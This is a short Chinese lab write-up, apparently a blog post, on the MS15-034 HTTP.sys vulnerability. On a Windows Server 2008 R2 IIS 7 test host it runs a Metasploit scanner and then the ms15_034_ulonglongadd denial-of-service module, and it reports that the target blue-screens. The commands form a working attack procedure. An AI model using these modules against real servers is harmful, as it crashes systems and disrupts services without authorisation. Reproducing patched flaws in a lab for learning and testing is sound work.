远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致该漏洞。该漏洞利用成功可使目标机器蓝屏。
微软官方说明:
1、环境搭建
使用的是Windows server 2008 R2 x64里面自带的II7。
![](https://img2018.cnblogs.com/blog/1269891/201910/1269891-20191018154834468-186005591.png)
2、漏洞验证
该scanner与exp早已在msf中集成
加载漏洞验证模块
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.112.130
![](https://img2018.cnblogs.com/blog/1269891/201910/1269891-20191018154843189-758860602.png)
3、漏洞利用
加载漏洞利用模块
use auxiliary/dos/http/ms15_034_ulonglongadd
![](https://img2018.cnblogs.com/blog/1269891/201910/1269891-20191018154850641-1215690463.png)
被攻击主机瞬间蓝屏。
![](https://img2018.cnblogs.com/blog/1269891/201910/1269891-20191018154905031-653371748.png)